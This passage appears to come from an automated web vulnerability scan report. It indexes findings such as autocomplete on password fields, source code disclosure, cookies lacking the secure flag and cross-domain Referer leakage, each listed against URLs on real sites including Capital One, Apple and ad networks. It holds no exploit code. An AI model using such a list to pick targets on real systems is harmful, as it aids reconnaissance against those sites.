11.24. http://ots.optimize.webtrends.com/ots/ots/js-3.1/311121/1027ed543b58578e6e3b824071758d9bdeafd1265a7b24402f7551e927c3acb81cdbfa67bfd3446b42706edbe6b0608936758c58f0c7d1f68b5cd4c42f5e53570bdeeee23870722b7d8b04c597f794d7783788d7dcd698ad7762aafea74aa37fa510cf7fb65c91e76191dbdbfc018d381dcdbf4f180bd9e2e9dbca7cc5c43a11e023d7a7981e3897c9fb0faa723125b37b97068f26a4eab5c4c3548a0c623005a73d5504a9bf9de72f4cd03f9bbbe1e8461e15f54b45d987124df70c44f3c0e5ba4847f3eed4beed5e6ab1b12de202e38127137a41acc581ec0fecd3a959a3a538fb2f660ff25ba0654719dfbec80906eeaf8e6b329ad1c66a04d5dcf192e3cde61c254f6c88534da58802b5398ea24b9efa9ba685dfd72bea4fa8190c69ae5ede6f0721ccb34e717c6107bcfaf2cfe44f88fec42e36ffe9116f59a6f918a80dd8e17e504876f2e69c508c691b6d9281fff0acd3e99db7f9b07ac79b36cd607e06da5e9c4458d76d0eeac1f394a802d460f590fe6ea7f666d23dccd20abac2d92880ff34a405027857b7f2db653389d23a43638d06e3f765a2d8d598f1062f8fcd643983437aeac41c62611881d352de9d97c32cf54f777d612b929d8913b5bc8b0379af246e1bba7d1821ce8b1b8db8d166b7f52081b0a29d9119cb9a4f447873339c33193f96e2f108ab154593263be7f6518d1944fa3b1b1cec003d123452e5333cec0b0f3c0ae168e5d0e9db1a53bf3e808baf3f24e64c14c3f2b1e02cee7dfd5cb0cdcc45ad329b17c70e526b36a57e0b3bf603170be9a33aafff9eca4a1237a8ffe472485706d9f6c895e32c048508fbc64699631b195653c891687399cd539d3d95b6bf7900cb355e8251411b31212492b4091796c5e2d549c235a07490aa42afdae8548a987faccef67a1445162cd38c7499b47ab78ad924ef99525bd815e63ce7e885fe39ca6822ceb3602d0059b0a8f279e80766642b31203aa6d6ee97b9139867ee1aa7ba3f02f41253bf90b753118e080e6a038d7c0b2be2dc588716e7c6fc4e44d4d21802c75c1e8806abefaa114127472ef49590b2b5d5d52a87d622d582fb317c59bf26d4866e09d8a6c7a747582d807bb41131bf80bb4a8a24de4bc3ee7f8eef25e09fc0178bbc46a0a277ef134dbcf1ca97ea6ca96afc78a753694fe0857a6a3e32243f4ef6cc09f2332399d9d6b530b1b82b7bd324435314e635aa5253c38beeb1db2ad850da9fc12d1499010dbb2637e44e058368dcd0c776032f802db4acabefd54c5dee0ba16f60e6a6b2c1ace90fa07cc47b900c5174eceb36fd04d48af115d89be05c6c3e551e620b3a5ade8a9ad503d1f87ea9eae460023c247a3bd2c7432c3944c4d2fe440c587c86375db1c89060973f59d04e9789b6e43a04d4773063e59072ff7d9b9e033c5eb1ba6c5622ab57a7359c1c627019c9cdb4253bf4d2c877529f44ffe96a4e6079d1755855503fb07d4e2f4b2ff8b6dfd9c2bf3df203913969704acae50f9dabbce015db5f187ccaf1e838551259e3d016f9d10ca3f62e1ac73921d7d7f7668c16055fbd964d70510d824bc6a4fc13ede16c8529b3519e560528905a6c698a589515bca2c3dd41390cd58e004bfcb88af5a73e26245b6d033bd9b438c391c763b212a7a30ea79b75490603bcd1af2342fb0e53c16725ac86b99104b7858efe72acb55e7faa22a53e4b676f15b9f3c5097bfaedfeae70071cde9d9213790950c684e4e03df0e2a17e4551cfde0e5517f19b1fc0e374c6183a508779a0763e68b8d5b62c6855cd1e9ce1ab1f80919279c7f38496119233d88d1a3dbc24e85d3d838d5783d2566d68a0051f463b6f4bfdd3331d06c8b6a5d51c76f15a5d21443dbd0c6670c7bdaa3be0a104bbf57876dba9c5c928ddf236591ef12aa7c129be5265b8cd9ca3383564f530c9dc873419440ef867fa5712fc8cd9d589f6acaa54857770a79f59f4618f43dadef23cadec93964ed4b1e92d4a0d2076ce9ef36df78c97dfc78977bd6191d8ced1c3fb5760e1e47e4a45c795f13d92fda6a31a2c06cbc8a0c8e2a660ebbf5d623b135ad8ab210b8c645d4f6137873627d59f7fba294317baec039dc250131ca3fbe973a9a77984547c4816041b9c62

11.25. http://ots.optimize.webtrends.com/ots/ots/js-3.1/311121/1027ed543b58578e6e3b824071758d9bdeafd1265a7b24402f7551e927c3acb81cdbfa67bfd3446b42706edbe6b0608936758c58f0c7d1f68b5cd4c42f5e53570bdeeee23870722b7d8b04c597f794d7783788d7dcd698ad7762aafea74aa37fa510cf7fb65c91e76191dbdbfc018d381dcdbf4f180bd9e2e9dbca7cc5c43a11e023d7a7981e3897c9fb0faa723125b37b97068f26a4eab5c4c3548a0c623005a73d5504a9bf9de72f4cd03f9bbbe1e8461e15f54b45d987124df70c44f3c0e5ba4847f3eed4beed5e6ab1b12de202e38127137a41acc581ec0fecd3a959a3a538fb2f660ff25ba0654719dfbec80906eeaf8e6b329ad1c66a04d5dcf192e3cde61c254f6c88534da58802b5398ea24b9efa9ba685dfd72bea4fa8190c69ae5ede6f0721ccb34e717c6107bcfaf2cfe44f88fec42e36ffe9116f59a6f918a80dd8e17e504876f2e69c508c691b6d9281fff0acd3e99db7f9b07ac79b36cd607e06da5e9c4458d76d0eeac1f394a802d460f590fe6ea7f666d23dccd20abac2d92880ff34a405027857b7f2db653389d23a43638d06e3f765a2d8d598f1062f8fcd643983437aeac41c62611881d352de9d97c32cf54f777d612b929d8913b5bc8b0379af246e1bba7d1821ce8b1b8db8d166b7f52081b0a29d9119cb9a4f447873339c33193f96e2f108ab154593263be7f6518d1944fa3b1b1cec003d123452e5333cec0b0f3c0ae168e5d0e9db1a53bf3e808baf3f24e64c14c3f2b1e02cee7dfd5cb0cdcc45ad329b17c70e526b36a57e0b3bf603170be9a33aafff9eca4a1237a8ffe472485706d9f6c895e32c048508fbc64699631b195653c891687399cd539d3d95b6bf7900cb355e8251411b31212492b4091796c5e2d549c235a07490aa42afdae8548a987faccef67a1445162cd38c7499b47ab78ad924ef99525bd815e63ce7e885fe39ca6822ceb3602d0059b0a8f279e80766642b31203aa6d6ee97b9139867ee1aa7ba3f02f41253bf90b753118e080e6a038d7c0b2be2dc588716e7c6fc4e44d4d21802c75c1e8806abefaa114127472ef49590b2b5d5d52a87d622d582fb317c59bf26d4866e09d8a6c7a747582d807bb41131bf80bb4a8a24de4bc3ee7f8eef25e09fc0178bbc46a0a277ef134dbcf1ca97ea6ca96afc78a753694fe0857a6a3e32243f4ef6cc09f2332399d9d6b530b1b82b7bd324435314e635aa5253c38beeb1db2ad850da9fc12d1499010dbb2637e44e058368dcd0c776032f802db4acabefd54c5dee0ba16f60e6a6b2c1ace90fa07cc47b900c5174eceb36fd04d48af115d89be05c6c3e551e620b3a5ade8a9ad503d1f87ea9eae460023c247a3bd2c7432c3944c4d2fe440c587c86375db1c89060973f59d04e9789b6e43a04d4773063e59072ff7d9b9e033c5eb1ba6c5622ab57a7359c1c627019c9cdb4253bf4d2c877529f44ffe96a4e6079d1755855503fb07d4e2f4b2ff8b6dfd9c2bf3df203913969704acae50f9dabbce015db5f187ccaf1e838551259e3d016f9d10ca3f62e1ac73921d7d7f7668c16055fbd964d70510d824bc6a4fc13ede16c8529b3519e560528905a6c698a589515bca2c3dd41390cd58e004bfcb88af5a73e26245b6d033bd9b438c391c763b212a7a30ea79b75490603bcd1af2342fb0e53c16725ac86b99104b7858efe72acb55e7faa22a53e4b676f15b9f3c5097bfaedfeae70071cde9d9213790950c684e4e03df0e2a17e4551cfde0e5517f19b1fc0e374c6183a508779a0763e68b8d5b62c6855cd1e9ce1ab1f80919279c7f38496119233d88d1a3dbc24e85d3d838d5783d2566d68a0051f463b6f4bfdd3331d06c8b6a5d51c76f15a5d21443dbd0c6670c7bdaa3be0a104bbf57876dba9c5c928ddf236591ef12aa7c129be5265b8cd9ca3383564f530c9dc8734195e13e473e5477f80fae3f4f889c7a853856a70bf995a8208e85de0f4cf1d9dccbaa929d2fcbc646e010a6083c1be46d0eb909292c053b14b8795919ce8dc3067b1bb3d7345cb89da2f89fef0a17b13309a9ef385b98035afeb4a79786d398dba2f4f8e65081d313780362dd1cd7eef7b4646eaea4084d0667e77d299cb65a1b72184547c481603bc57d1

11.26. http://ots.optimize.webtrends.com/ots/ots/js-3.1/311121/1027ed543b58578e6e3b824071758d9bdeafd1265a7b24402f7551e927c3acb81cdbfa67bfd3446b42706edbe6b0608936758c58f0c7d1f68b5cd4c42f5e53570bdeeee23870722b7d8b04c597f794d7783788d7dcd698ad7762aafea74aa37fa510cf7fb65c91e76191dbdbfc018d381dcdbf4f180bd9e2e9dbca7cc5c43a11e023d7a7981e3897c9fb0faa723125b37b97068f26a4eab5c4c3548a0c623005a73d5504a9bf9de72f4cd03f9bbbe1e8461e15f54b45d987124df70c44f3c0e5ba4847f3eed4beed5e6ab1b12de202e38127137a41ace38de70fd1d0bd08fcf372b5762404eb44e72200079ef5c91708f9a5ae736596cbdf675b99a2f886bec6a144744639c5121396c44ffe2bc2b3439debd6b39cdecc3ab105a609097cf452c6200f2be9be4377667b13ccbae2cdfa43a8e3997766bbae273b5ab1ff469a5692a672421334b1f3ba5183650623829decb693d6b682e0afe92d849a36d77c696f9b02f52213c7753c022c538b

11.27. http://ots.optimize.webtrends.com/ots/ots/js-3.1/311121/1027ed543b58578e6e3b824071758d9bdeafd1265a7b24402f7551e927c3acb81cdbfa67bfd3446b42706edbe6b0608936758c58f0c7d1f68b5cd4c42f5e53570bdeeee23870722b7d8b04c597f794d7783788d7dcd698ad7762aafea74aa37fa510cf7fb65c91e76191dbdbfc018d381dcdbf4f180bd9e2e9dbca7cc5c43a11e023d7a7981e3897c9fb0faa723125b37b97068f26a4eab5c4c3548a0c623005a73d5504a9bf9de72f4cd03f9bbbe1e8461e15f54b45d987124df70c44f3c0e5ba4847f3eed4beed5e6ab1b12de202e38127137a41ace38de70fd1d0bd08fcf372b5762404eb44e72200079ef5c91708f9a5ae736596cbdf675b99a2f886bec6a144744639c5121396c44ffe2bc2b3439debd6b39cdecc3ab105a609097cf452c6200f2be9be4377667b13ccbae2cdfa43a8e3997766bbae273b5ab1ff469a5692a672421334b1f3ba5183650623829decb693d6b782e0af9f4bfcef26c36e0336dd479c6658e55070b5e4b7bde575cc77e590f867a08763d726c3f654ef95915adab36bfc3316044cd6a98a351cdbc765154dd94cf8f96bd3f0e1a3d64c41d4f8322d882278fbdb09384558fc8f7582dc8dbd36862f1a683879d69ad104caddc45b33a22e2e65f1675c77ef961b91a2d167b7f57993dfcd8fec5580d8231a393458d620142e94f6f269a51b2aa34877aff62cfa6133e8200a75b3497c79770b83465fb0385d11479666fda58cb46d32ac54e7e9a04334e25d15d5a9f7a264df2eda17fe91dc4ecc20e963d77951256af5214019cd6f611bf6b23eb9fb9dbd561721adf984763f4077d2bc84b0af0863f60defc331fd636c7927438ad26c6eccb308df66a0d1ff243efc1c698559510e214e23fff01516a58fa093338256ef38c5ea138596a112dcf552fbdefe2c4c1b436894db29d0a47cb09fd3488ccf12068f54fd24f588e29247b90d39b9d40132105bfee5a360f21b757e3a35367cfcc6f186dd15e972e41ee4e67941aa4e0eaa87b73507fd1f492b52d1234a3ce2cb4ff772f0c6bd0b16908f0b05cc4d1dfe10af9dba1043711677a48995b7a7d4a23a82dd4ea3fc9b260d4ea826e1c6325fc2a6c2e650583a9609804e70e8a5f716dd338e0bf6ae34cfbe7ebfdf8022cfe474f0fe21af4665e3a79e8ae91db569886db8420c19b2b30c2c1c63732f18b5ed18ef28279ec4ddb637afa8431bc274021742b572a14459d6f4b2e6ab6bfe07ca81960925b4263fcc363fe34c668a7883928025527d972ea2aea9ee854450bf5dbb737684cdd0bfdff903b77bdf72807f567c8d872286509dc6c75890d0b6496e3c401d1b0c2d45ab809ad65f96ba39fdb3a07f033a3b7a4a8bc0316967129582a418440a76875c4ab6bd836c845d108009fecceeb27304b13a1272ce9369ce22c1ae722745a9ae1e0d72ed09f77e9d7b1d1778919ed76173b2b2d76d12d473afb223296c6aa0782f732a41e55e5f21455ac780dfbfdaa74baa54913b096350a2a2538da9bce11ccd5c0770d0f1e32750022f9fa403efc055eaa17044cf2b5dc5c9e13fd24a4120d6805860500f835dc7a2f217ebee6d8f3fc044f00e1603fa4f3555e30ff220bbc4a3ac566017df870717fbc4f692a62b5f5b2f12782aa5ca41a897a702d618dfd102d095794e620edbafe46c12f90e58c93131cda5f4d64fbda184b517cada3714df33af2a363f3856e5b59a5c3b8b99bdfc722c40d2c3b52d6e5c14daf9868257d58bda654d169283155b199ebb7094b7239f0f6613d37ba427343eb1d3b62c6f04c10e99b3e8129391e77c83be93f727fa5ff3a245056473e3

11.28. http://pixel.everesttech.net/2368/gr

11.29. http://pixel1350.everesttech.net/1350/p

11.30. http://t.mookie1.com/t/v1/imp

11.31. http://wow.curse.com/user/NetworkCookie/ajaxSession.aspx

11.32. http://www.pages05.net/WTS/event.jpeg

11.33. http://www.seashepherd.org/

11.34. http://www.seashepherd.org/news-and-media/2011/07/19/emergency-sos-from-captain-paul-watson-save-our-ship-1263

11.35. http://www.silverpop.com/preferences_sf/prepopulateFields.js.sp

11.36. http://204.124.80.52/dcs5w0txb10000wocrvqy1nqm_6n1p/dcs.gif

11.37. http://a.collective-media.net/adj/cm.yearbook/ford_ron_071911

11.38. http://a.netmng.com/hic/

11.39. http://a.tribalfusion.com/j.ad

11.40. http://a1.interclick.com/ColDta.aspx

11.41. http://a1.interclick.com/getInPageJSProcess.aspx

11.42. http://ad.turn.com/server/ads.js

11.43. http://ad.turn.com/server/pixel.htm

11.44. http://ad.yieldmanager.com/pixel

11.45. http://ad.yieldmanager.com/unpixel

11.46. http://ads.adap.tv/beacons

11.47. http://ads.adap.tv/cookie

11.48. http://ads.pointroll.com/PortalServe/

11.49. http://ads.undertone.com/f

11.50. http://adserver.adtechus.com/addyn%7C3.0%7C5298.1%7C1375467%7C0%7C154%7CADTECH

11.51. http://ak1.abmr.net/is/a.collective-media.net

11.52. http://ak1.abmr.net/is/showadsak.pubmatic.com

11.53. http://amch.questionmarket.com/adsc/d922005/24/42823090/decide.php

11.54. http://amch.questionmarket.com/adsc/d922005/24/42823584/decide.php

11.55. http://amch.questionmarket.com/adsc/d922005/24/42823586/decide.php

11.56. http://amch.questionmarket.com/adsc/d922005/24/42825515/decide.php

11.57. http://amch.questionmarket.com/adsc/d922005/24/42825637/decide.php

11.58. http://ap.lijit.com/www/delivery/retarget.php

11.59. http://api.bizographics.com/v1/profile.json

11.60. http://api.bizographics.com/v1/profile.redirect

11.61. http://apr.lijit.com///www/delivery/ajs.php

11.62. http://ar.atwola.com/atd

11.63. http://ar.voicefive.com/bmx3/broker.pli

11.64. http://articleonepartners.app7.hubspot.com/salog.js.aspx

11.65. http://at.amgdgt.com/ads/

11.66. http://b.scorecardresearch.com/b

11.67. http://b.scorecardresearch.com/p

11.68. http://b.scorecardresearch.com/r

11.69. http://b.voicefive.com/b

11.70. http://bcp.crwdcntrl.net/4/c=520%7Crand=110304385%7Cpv=y%7Crt=ifr

11.71. http://bh.contextweb.com/bh/getuid

11.72. http://bostonglobe.tt.omtrdc.net/m2/bostonglobe/mbox/standard

11.73. http://bs.serving-sys.com/BurstingPipe/adServer.bs

11.74. http://c.atdmt.com/c.gif

11.75. http://c.bing.com/c.gif

11.76. http://c.live.com/c.gif

11.77. http://ce.lijit.com/merge

11.78. http://cf.addthis.com/red/p.json

11.79. http://clients.mobilecause.com/lists/1227/subscriptions/web.js

11.80. http://clk.atdmt.com/goiframe/222276744/331989646/direct

11.81. http://clk.atdmt.com/goiframe/223672189/334126009/direct

11.82. http://cms.quantserve.com/dpixel

11.83. http://code.msdn.microsoft.com/

11.84. http://code.msdn.microsoft.com/globalresources/scripts/ms2.js

11.85. http://code.msdn.microsoft.com/site/upload

11.86. http://community.spiceworks.com/r/595

11.87. http://content.mkt51.net/lp/static/js/iMAWebCookie.js

11.88. http://contextlinks.netseer.com/dsatserving2/servlet/BannerServer

11.89. http://cspix.media6degrees.com/orbserv/hbpix

11.90. http://d.101m3.com/afr.php

11.91. http://d.101m3.com/lg.php

11.92. http://d.audienceiq.com/r/dm/mkt/73/mpid//mpuid/4146544210108361256/mchpid/3/url/

11.93. http://forums.vostu.com/

11.94. http://forums.vostu.com/forums/41-Como-Jogar

11.95. http://greatpondsma.org/

11.96. http://home.live.com/search

11.97. http://home.live.com/search/

11.98. http://home.live.com/search/hip

11.99. http://i.w55c.net/ping_match.gif

11.100. http://idcs.interclick.com/Segment.aspx

11.101. http://image2.pubmatic.com/AdServer/Pug

11.102. http://image2.pubmatic.com/AdServer/Pug

11.103. http://image2.pubmatic.com/AdServer/Pug

11.104. http://images.apple.com/global/metrics/js/s_code_h.js

11.105. http://images.apple.com/global/nav/scripts/globalnav.js

11.106. http://images.apple.com/global/nav/styles/navigation.css

11.107. http://images.apple.com/global/scripts/apple_core.js

11.108. http://images.apple.com/global/scripts/browserdetect.js

11.109. http://images.apple.com/global/scripts/content_swap.js

11.110. http://images.apple.com/global/scripts/lib/event_mixins.js

11.111. http://images.apple.com/global/scripts/lib/prototype.js

11.112. http://images.apple.com/global/scripts/lib/scriptaculous.js

11.113. http://images.apple.com/global/scripts/overlay_panel.js

11.114. http://images.apple.com/global/scripts/promomanager.js

11.115. http://images.apple.com/global/scripts/search_decorator.js

11.116. http://images.apple.com/global/scripts/swap_view.js

11.117. http://images.apple.com/global/scripts/view_master_tracker.js

11.118. http://images.apple.com/global/styles/base.css

11.119. http://images.apple.com/macpro/scripts/pagenav.js

11.120. http://images.apple.com/macpro/scripts/performance.js

11.121. http://images.apple.com/metrics/scripts/s_code_h.js

11.122. http://images.apple.com/support/css/base_new.css

11.123. http://images.apple.com/support/css/global/nav/navigation.css

11.124. http://images.apple.com/support/css/suggest2.css

11.125. http://images.apple.com/support/css/support.css

11.126. http://images.apple.com/support/home/css/home2011.css

11.127. http://images.apple.com/support/iknow/scripts/ACQuicklinks2.js

11.128. http://images.apple.com/support/iknow/scripts/ACShortcuts.js

11.129. http://images.apple.com/support/scripts/AppleCareWeb/Modules/ExpressLane.js

11.130. http://images.apple.com/support/scripts/SCReporting.js

11.131. http://images.apple.com/support/scripts/module_decorator.js

11.132. http://images.apple.com/support/scripts/new_country.js

11.133. http://images.apple.com/support/scripts/new_support_coverage/cookies.js

11.134. http://images.apple.com/support/scripts/new_support_coverage/en_strings.js

11.135. http://images.apple.com/support/scripts/new_support_coverage/functions.js

11.136. http://images.apple.com/support/scripts/psp_geos.js

11.137. http://images.apple.com/support/scripts/support.global.js

11.138. http://images.apple.com/support/scripts/warranty_check/warrantykeys.js

11.139. http://images.apple.com/support/scripts/warranty_check/warrantypsp.js

11.140. http://js.revsci.net/gateway/gw.js

11.141. http://leadback.advertising.com/adcedge/lb

11.142. http://legolas.nexac.com/lgalt

11.143. http://lifescript.us.intellitxt.com/intellitxt/front.asp

11.144. http://lm.trafficmp.com/clicksense/epic

11.145. http://load.exelator.com/load/

11.146. http://m.webtrends.com/dcsjwb9vb00000c932fd0rjc7_5p3t%20/dcs.gif

11.147. http://m.webtrends.com/dcsjwb9vb00000c932fd0rjc7_5p3t/dcs.gif

11.148. http://m.webtrends.com/dcsmgru7m99k7mqmgrhudo0k8_8c6m/dcs.gif

11.149. http://m.webtrends.com/dcso6p7z7100004j151amwxpo_5q2j/dcs.gif

11.150. http://media.fastclick.net/w/get.media

11.151. http://media.trafficmp.com/a/js

11.152. http://media.trafficmp.com/a/js

11.153. http://msdn.microsoft.com/magazine/ee336135.aspx

11.154. http://mssto.112.2o7.net/b/ss/msstoerrors/1/H.20.2--NS/0

11.155. http://odb.outbrain.com/utils/get

11.156. https://onlinebanking.capitalone.com/CapitalOne/OAO/initiation.aspx

11.157. http://p.brilig.com/contact/bct

11.158. http://pix04.revsci.net/A11149/a4/0/0/123.302

11.159. http://pix04.revsci.net/D08734/a1/0/3/0.js

11.160. http://pix04.revsci.net/G07608/a4/0/0/pcx.js

11.161. http://pix04.revsci.net/J08778/b3/0/3/1008211/347187000.js

11.162. http://pix04.revsci.net/J08778/b3/0/3/1008211/435975349.js

11.163. http://pix04.revsci.net/J08778/b3/0/3/1008211/674742100.js

11.164. http://pixel.33across.com/ps/

11.165. http://pixel.quantserve.com/pixel

11.166. http://pixel.quantserve.com/pixel/p-c9d_b-0iR8pjg.gif

11.167. http://poweredby.kosmix.com/external/ads/kinsert/kosmixCL.js

11.168. http://profile.live.com/Handlers/Plt.mvc

11.169. http://profile.live.com/favicon.ico

11.170. http://r.openx.net/set

11.171. http://r.turn.com/r/du/id/L21rdC8xL21jaHBpZC8y/rnd/772053252

11.172. http://r.turn.com/r/du/id/L21rdC8xL21jaHBpZC8z/

11.173. http://rd.apmebf.com/w/get.media

11.174. http://rmedia.boston.com/RealMedia/ads/adstream_lx.ads/www.boston.com/lifestyle/default/L32/1921254557/RIGHT1/boston/m_smiletrain070611_ros_SKY/160x600_rosx_071211-smiletrain.html/72634857383034474942344141544233

11.175. http://rs.gwallet.com/r1/pixel/x960r=772053252

11.176. http://rt.legolas-media.com/lgrt

11.177. http://sales.liveperson.net/hc/54909046/

11.178. http://sales.liveperson.net/hc/54909046/

11.179. http://segment-pixel.invitemedia.com/pixel

11.180. http://segment-pixel.invitemedia.com/set_partner_uid

11.181. http://segments.adap.tv/data

11.182. http://segments.adap.tv/data/

11.183. http://showadsak.pubmatic.com/AdServer/AdServerServlet

11.184. http://sitelife.boston.com/ver1.0/Direct/Jsonp

11.185. http://sm6.sitemeter.com/js/counter.asp

11.186. http://social.msdn.microsoft.com/Search/en-US

11.187. http://social.msdn.microsoft.com/search/en-US/en-USebb6e

11.188. http://sourceforge.net/projects/hoytllc-vcloud/

11.189. http://sync.adap.tv/sync

11.190. http://sync.mathtag.com/sync/img

11.191. http://t4.trackalyzer.com/trackalyze.asp

11.192. http://tags.bluekai.com/ids

11.193. http://tags.bluekai.com/site/2731

11.194. http://tags.bluekai.com/site/2751

11.195. http://tags.bluekai.com/site/365

11.196. http://trk.etrigue.com/track.php

11.197. http://uat.netmng.com/pixel/

11.198. http://user.lucidmedia.com/clicksense/user

11.199. http://user.lucidmedia.com/clicksense/user/browser

11.200. http://vap2den1.lijit.com/www/delivery/lg.php

11.201. http://visualstudiogallery.msdn.microsoft.com/85f0aa38-a8a8-4811-8b86-e7f0b8d8c71b/

11.202. http://visualstudiogallery.msdn.microsoft.com/85f0aa38-a8a8-4811-8b86-e7f0b8d8c71b/description

11.203. http://visualstudiogallery.msdn.microsoft.com/85f0aa38-a8a8-4811-8b86-e7f0b8d8c71b/stats/RegisterPageView

11.204. http://visualstudiogallery.msdn.microsoft.com/globalresources/scripts/ms2.js

11.205. http://visualstudiogallery.msdn.microsoft.com/site/85f0aa38-a8a8-4811-8b86-e7f0b8d8c71b/eula

11.206. http://visualstudiogallery.msdn.microsoft.com/site/favorites

11.207. http://visualstudiogallery.msdn.microsoft.com/site/search

11.208. http://web2.checkm8.com/adam/detect

11.209. http://web2.checkm8.com/adam/em/ad_play/442707/cat=47183/uhook=6DF1BDD4075B/criterias=32_0_43_3_103_18_104_12_116_225_117_225045_118_1_120_4000000100_122_4225045100_280_22_282_0_283_0_/ord=8851318688487949

11.210. http://wow.curse.com/Themes/Common/v6/images/loading.gif

11.211. http://wow.curse.com/Themes/Common/v6/images/wow/bkg-box-label.png

11.212. http://wow.curse.com/Themes/Common/v6/styles/portals/wow.css

11.213. http://wow.curse.com/Themes/Curse-Wow/Styles/theme.css

11.214. http://wow.curse.com/Themes/Curse-Wow/Styles/theme.css.aspx

11.215. http://wow.curse.com/WebResource.axd

11.216. http://wow.curse.com/adserver/default.aspx

11.217. http://wow.curse.com/themes/common/v6/styles/browser/ie7.css

11.218. http://www.bing.com/fd/ls/l

11.219. http://www.bing.com/search

11.220. http://www.burstnet.com/enlightn/8117//3E06/

11.221. http://www.burstnet.com/enlightn/8171//99D2/

11.222. http://www.capitalone.com/autoloans/before-you-apply.php

11.223. http://www.capitalone.com/autoloans/redirect.php

11.224. http://www.capitalone.com/directbanking/

11.225. http://www.capitalone.com/directbanking/online-savings-accounts/interestplus-online-savings-account/open-account/

11.226. http://www.capitalone.com/redirect.php

11.227. http://www.capitalone.com/stylesheets/https-common/header.css

11.228. http://www.kosmix.com/flash/kxcd2.swf

11.229. http://www.observer.com/

11.230. http://www.othersonline.com/partner/scripts/myyearbook/alice.js

11.231. http://www.othersonline.com/partner/scripts/myyearbook/page_parser.js

11.232. http://www.righthealth.com/contextlinks/lifescript.com/cl.js

11.233. http://www.righthealth.com/external/ads/clo.gif

11.234. http://www.silverlight.net/getting-started

11.235. http://www.socialirl.com/storage/Social-IRL-Logofor-Squares.gif

11.236. http://www.uscg.mil/global/img/primary_uscg.jpg

11.237. http://www.walmartlabs.com/

11.238. http://www.wtp101.com/pull_sync

12. Password field with autocomplete enabled

12.1. https://acn-members.apple.com/mo_login/login.lasso

12.2. http://assets.0.mybcdna.com/JavaScript/apps/HomeBeforeLogin/hblv2.js

12.3. http://forums.vostu.com/

12.4. http://forums.vostu.com/forums/41-Como-Jogar

12.5. http://static.curse.com/themes/common/v6/scripts/core.js

12.6. https://towernet.capitalonebank.com/loginpage.html

12.7. http://www.boston.com/lifestyle/articles/2011/07/23/facebook_twitter_obligations_persist_during_vacations/

12.8. https://www.google.com/accounts/ServiceLogin

13. Source code disclosure

13.1. http://a.fsdn.com/con/js/min/sf.js

13.2. http://cache.boston.com/universal/js/underscore-min-1.1.6.js

13.3. http://cache.boston.com/universal/newsprojects/widgets/slider/slider.js

13.4. http://consultants-locator.apple.com/javascript/portal.1309219793.js

13.5. http://i1.social.s-msft.com/Search/scriptloader.js

13.6. http://secure.adnxs.com/seg

13.7. http://www.lifescript.com/JavaScript/Tracking/EfficientFrontier.js

13.8. http://www.microsoft.com/en-us/security_essentials/shared/templates/components/oneMscomBlade/oneMscomBlade.css

14. ASP.NET debugging enabled

15. Referer-dependent response

15.1. http://lifescript.us.intellitxt.com/intellitxt/front.asp

15.2. http://www.facebook.com/plugins/like.php

15.3. http://www.facebook.com/plugins/likebox.php

16. Cross-domain POST

16.1. http://corp.klout.com/contact

16.2. http://www.dailymarkets.com/stock/2011/07/20/jack-henry-associates-to-offer-microsoft-productivity-software-via-subscription/

16.3. http://www.dailymarkets.com/stock/2011/07/20/jack-henry-associates-to-offer-microsoft-productivity-software-via-subscription/

16.4. http://www.treehugger.com/daylife/related/72065.html

16.5. http://www.treehugger.com/files/2011/07/sea-shepherd-ship-detained-shetland-islands-million-dollar-bond-needed.php

16.6. http://www.treehugger.com/galleries/

16.7. http://www.treehugger.com/science_technology/

16.8. http://www.treehugger.com/travel_nature/

17. SSL cookie without secure flag set

17.1. https://onlinebanking.capitalone.com/CapitalOne/OAO/initiation.aspx

17.2. https://servicing.capitalone.com/c1/login.aspx

18. Cross-domain Referer leakage

18.1. http://a.collective-media.net/cmadj/cm.yearbook/ford_ron_071911

18.2. http://a.fsdn.com/con/css/sf.min.css

18.3. http://a.fsdn.com/con/js/min/sf.js

18.4. http://a.netmng.com/hic/

18.5. http://a.netmng.com/hic/

18.6. http://a.rad.msn.com/ADSAdClient31.dll

18.7. http://a.rad.msn.com/ADSAdClient31.dll

18.8. http://a.rad.msn.com/ADSAdClient31.dll

18.9. http://a.tribalfusion.com/j.ad

18.10. http://ad.doubleclick.net/adi/N1558.NetMining/B4616765.3

18.11. http://ad.doubleclick.net/adi/N1558.NetMining/B4820225

18.12. http://ad.doubleclick.net/adi/N1558.NetMining/B4820225.2

18.13. http://ad.doubleclick.net/adi/N5327.LifeScript/B5695360.3

18.14. http://ad.doubleclick.net/adi/N5327.LifeScript/B5695360.3

18.15. http://ad.doubleclick.net/adi/N5767.dsc.discoveryOX2348/B5649101.33

18.16. http://ad.doubleclick.net/adi/N5823.Discovery/B5629823.10

18.17. http://ad.doubleclick.net/adi/N5823.Discovery/B5629823.11

18.18. http://ad.doubleclick.net/adi/N5823.Discovery/B5629823.12

18.19. http://ad.doubleclick.net/adi/N5823.Discovery/B5629823.16

18.20. http://ad.doubleclick.net/adi/N5823.Discovery/B5629823.17

18.21. http://ad.doubleclick.net/adi/interactive.wsj.com/markets_newsreel

18.22. http://ad.doubleclick.net/adi/interactive.wsj.com/markets_story

18.23. http://ad.doubleclick.net/adi/interactive.wsj.com/markets_story

18.24. http://ad.doubleclick.net/adi/interactive.wsj.com/markets_story

18.25. http://ad.doubleclick.net/adi/interactive.wsj.com/markets_story

18.26. http://ad.doubleclick.net/adj/N2883.132636.QUADRANTONE.COM/B5629721.18

18.27. http://ad.doubleclick.net/adj/cm.yearbook/ford_ron_071911

18.28. http://ad.doubleclick.net/adj/cm.yearbook/ford_ron_071911

18.29. http://ad.doubleclick.net/adj/interactive.wsj.com/markets_story

18.30. http://ad.doubleclick.net/adj/lfs2.lifescript/conditions

18.31. http://ad.doubleclick.net/adj/lqm.codeplex.site/C-rawr

18.32. http://ad.doubleclick.net/adj/lqm.codeplex.site/C-rawr

18.33. http://ad.doubleclick.net/adj/ostg.sourceforge/cons_none_p71_text

18.34. http://ad.doubleclick.net/adj/ostg.sourceforge/pg_viewvc_p88_shortrec

18.35. http://ad.doubleclick.net/adj/scmag.hmktus/sc

18.36. http://ad.doubleclick.net/adj/scmag.hmktus/sc

18.37. http://ad.doubleclick.net/adj/scmag.hmktus/sc

18.38. http://ad.yieldmanager.com/pixel

18.39. http://ads.pointroll.com/PortalServe/

18.40. http://ads.pointroll.com/PortalServe/

18.41. http://ads.pointroll.com/PortalServe/

18.42. http://adserver.adtechus.com/addyn/3.0/5259.1/1248404/0/225/ADTECH

18.43. http://assets.0.mybcdna.com/JavaScript/apps/HomeBeforeLogin/hblv2.js

18.44. http://assets.mybcdna.com/JavaScript/apps/site.js

18.45. http://assets.tumblr.com/iframe.html

